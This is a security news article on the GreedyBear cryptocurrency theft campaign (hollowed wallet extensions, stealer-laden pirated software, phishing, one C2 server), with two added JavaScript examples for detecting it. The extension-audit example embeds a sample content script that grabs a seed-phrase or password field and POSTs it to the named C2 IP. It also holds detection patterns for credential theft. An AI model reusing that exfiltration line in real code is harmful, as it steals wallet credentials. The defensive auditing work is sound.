The GreedyBear crypto theft campaign has entered a more aggressive phase, targeting cryptocurrency users worldwide with a coordinated mix of fake browser extensions, phishing websites, and malicious software. Researchers say the group has stolen over $1 million in digital assets, marking one of its most profitable runs to date.


Expanding the Attack Arsenal

GreedyBear’s operation now uses three interconnected attack vectors, each designed to harvest sensitive data, steal cryptocurrency, and compromise victim devices.

1. Malicious Browser Extensions

Security analysts found more than 150 Firefox extensions mimicking popular crypto wallets, including MetaMask, TronLink, Exodus, and Rabby Wallet. The extensions were first published as harmless code with authentic-looking branding and accumulated high ratings while they were still benign. A later update, a technique the researchers call Extension Hollowing, then swapped that safe code for malware that logs wallet credentials, session data, and the victim's IP address and sends them to a central server.
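The hollowing step means a store listing's age and rating say nothing about the code currently shipping, so the useful check is a static audit of the unpacked extension itself. The script below is an added example, not code from the article or from the researchers who reported the campaign. It flags the traits the article attributes to the hollowed wallet extensions: a name that imitates a wallet brand, host permissions broad enough to read every page, a hard-coded raw-IP endpoint (matched against the C2 address the article names), and credential-harvesting vocabulary next to an outbound request. The manifest and content script are constructed for the demo; the extension ID and URL path are placeholders, and the brand list is an assumption you would extend for your environment.

```javascript
// Added example: static audit of an unpacked Firefox extension for the traits the
// article associates with GreedyBear's hollowed wallet extensions. Not the
// researchers' tooling; thresholds and brand list are assumptions.
const WALLET_BRANDS = ["metamask", "tronlink", "exodus", "rabby"]; // assumed list
const KNOWN_C2 = new Set(["185.208.156.66"]);                       // IP named in the article
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];
const RAW_IP_URL = /https?:\/\/(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\b/g;
const CREDENTIAL_TERMS = /\b(seed[\s_-]*phrase|mnemonic|private[\s_-]*key|password)\b/i;
const OUTBOUND_CALL = /\b(fetch|XMLHttpRequest|sendBeacon)\b/;

function auditExtension(manifestJson, scriptSource) {
  const manifest = JSON.parse(manifestJson);
  const findings = [];

  // 1. Listing name impersonating a wallet brand
  const name = String(manifest.name || "").toLowerCase();
  const brand = WALLET_BRANDS.find((b) => name.includes(b));
  if (brand) findings.push(`name impersonates wallet brand "${brand}"`);

  // 2. Host permissions broad enough to read every page the victim visits
  const hosts = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const broad = hosts.filter((h) => BROAD_HOSTS.includes(h));
  if (broad.length) findings.push(`broad host permissions: ${broad.join(", ")}`);

  // 3. Hard-coded raw-IP endpoints; a match against KNOWN_C2 is called out by name
  for (const m of scriptSource.matchAll(RAW_IP_URL)) {
    const ip = m[1];
    findings.push(KNOWN_C2.has(ip) ? `known GreedyBear C2 ${ip}` : `raw IP endpoint ${ip}`);
  }

  // 4. Credential-harvesting vocabulary combined with a way to send it out
  if (CREDENTIAL_TERMS.test(scriptSource) && OUTBOUND_CALL.test(scriptSource)) {
    findings.push("reads wallet credentials and makes outbound requests");
  }

  const id = manifest.browser_specific_settings?.gecko?.id || "";
  // Two or more independent traits is the (assumed) threshold for "suspicious"
  return { id, name: manifest.name, findings, suspicious: findings.length >= 2 };
}

// Constructed sample: a "MetaMask" lookalike after its hollowing update.
// The extension ID and /collect path are placeholders, not observed values.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "MetaMask Wallet Helper",
  version: "1.4.2",
  permissions: ["storage", "<all_urls>"],
  browser_specific_settings: { gecko: { id: "hollowed-sample@example.invalid" } },
});
const SAMPLE_SCRIPT = `
  // lifted form fields are posted to a hard-coded endpoint
  const field = document.querySelector("#seed-phrase, #password");
  if (field) fetch("http://185.208.156.66/collect", { method: "POST", body: field.value });
`;

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPT), null, 2));
```

Run it against the unpacked directory of any installed extension by feeding in `manifest.json` and the concatenated scripts; a benign extension such as a tab counter with only the `tabs` permission produces no findings. The audit is deliberately signature-light: it does not try to recognise the malware, only the combination of reach, exfiltration path and wallet targeting that a hollowed extension needs.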

2. Malware Deployment

GreedyBear also distributed nearly 500 Windows executables disguised as cracked or pirated software. These downloads carried information-stealing malware such as LummaStealer and, in some cases, ransomware variants. The group primarily hosted these files on Russian-language piracy sites, where unsuspecting users searching for free software became easy targets.

3. Phishing Websites

The group’s phishing network features realistic sites designed to impersonate cryptocurrency wallets, hardware wallet support pages, and account recovery services. These sites lure victims into entering seed phrases or private keys, allowing attackers to drain accounts instantly.


Centralized Command Infrastructure

All stolen data, phishing operations, and malware control traffic point to the same command-and-control server, identified at IP address 185.208.156.66. This server manages exfiltrated credentials, processes stolen cryptocurrency, and coordinates the deployment of ransomware payloads.
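Because every channel reports to one address, a single indicator covers extension beacons, stealer exfiltration and phishing-form submissions alike. The script below is an added example, not code from the article or the researchers, that parses proxy access logs in Squid's native format and groups contacts with that address by internal client. The log lines are constructed for the demo. One caveat a responder should keep in mind: a lone IP is an easily rotated indicator, so treat a hit as a triage lead for the host in question rather than as proof that the absence of hits means the absence of compromise.

```javascript
// Added example: find internal hosts that contacted the C2 address named in the
// article, from Squid native-format access logs. Sample lines are constructed.
const C2_INDICATORS = new Set(["185.208.156.66"]);

// Squid native format: timestamp elapsed client action/code size method URL ...
const SQUID_LINE = /^(\d+\.\d+)\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+(\S+)\s+(\S+)/;

function parseSquidLine(line) {
  const m = SQUID_LINE.exec(line);
  if (!m) return null;
  const [, ts, client, status, method, url] = m;
  let host;
  try {
    host = new URL(url).hostname;            // http://host/path
  } catch {
    host = url.split(":")[0];                // CONNECT host:port has no scheme
  }
  return { ts: new Date(Number(ts) * 1000), client, status, method, url, host };
}

// Returns Map<clientIp, [{ts, method, url}]> for every request to a C2 indicator
function findC2Contacts(lines) {
  const byClient = new Map();
  for (const line of lines) {
    const rec = parseSquidLine(line);
    if (!rec || !C2_INDICATORS.has(rec.host)) continue;
    if (!byClient.has(rec.client)) byClient.set(rec.client, []);
    byClient.get(rec.client).push({ ts: rec.ts.toISOString(), method: rec.method, url: rec.url });
  }
  return byClient;
}

// Constructed sample log: one plaintext POST (extension-style beacon), one
// unrelated request, one TLS tunnel to the same address, and a malformed line.
const SAMPLE_SQUID_LOG = [
  "1723456789.123    120 10.0.0.12 TCP_MISS/200 512 POST http://185.208.156.66/collect - HIER_DIRECT/185.208.156.66 application/json",
  "1723456790.456     80 10.0.0.12 TCP_MISS/200 1024 GET http://example.invalid/news - HIER_DIRECT/203.0.113.5 text/html",
  "1723456801.001    300 10.0.0.33 TCP_TUNNEL/200 4096 CONNECT 185.208.156.66:443 - HIER_DIRECT/185.208.156.66 -",
  "this line is not a squid record",
];

for (const [client, hits] of findC2Contacts(SAMPLE_SQUID_LOG)) {
  console.log(client, JSON.stringify(hits));
}
```

Feeding the real log in is a matter of `fs.readFileSync(path, "utf8").split("\n")`; the parser skips anything it cannot read rather than aborting, which matters on large, partially corrupt logs. Extend `C2_INDICATORS` with the phishing domains from the researchers' report if you have them, since the same grouping logic applies to hostnames.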


A Rapidly Growing Threat

Researchers link GreedyBear’s current tactics to its earlier “Foxy Wallet” campaign, which used just 40 fake extensions. The new phase more than triples that scale. As one security analyst put it: “GreedyBear isn’t just diversifying—it’s industrializing its operations.”


Conclusion

The GreedyBear crypto theft campaign illustrates how cybercriminals can combine malicious browser extensions, phishing, and malware to devastating effect. By controlling all channels through a single infrastructure, the group maximizes efficiency and scale. Security experts urge users to install wallet extensions only from verified sources, avoid downloading pirated software, and double-check URLs before entering any sensitive information. Store ratings and review counts are not a trust signal here: the hollowed extensions earned theirs while still benign, before the malicious update shipped.
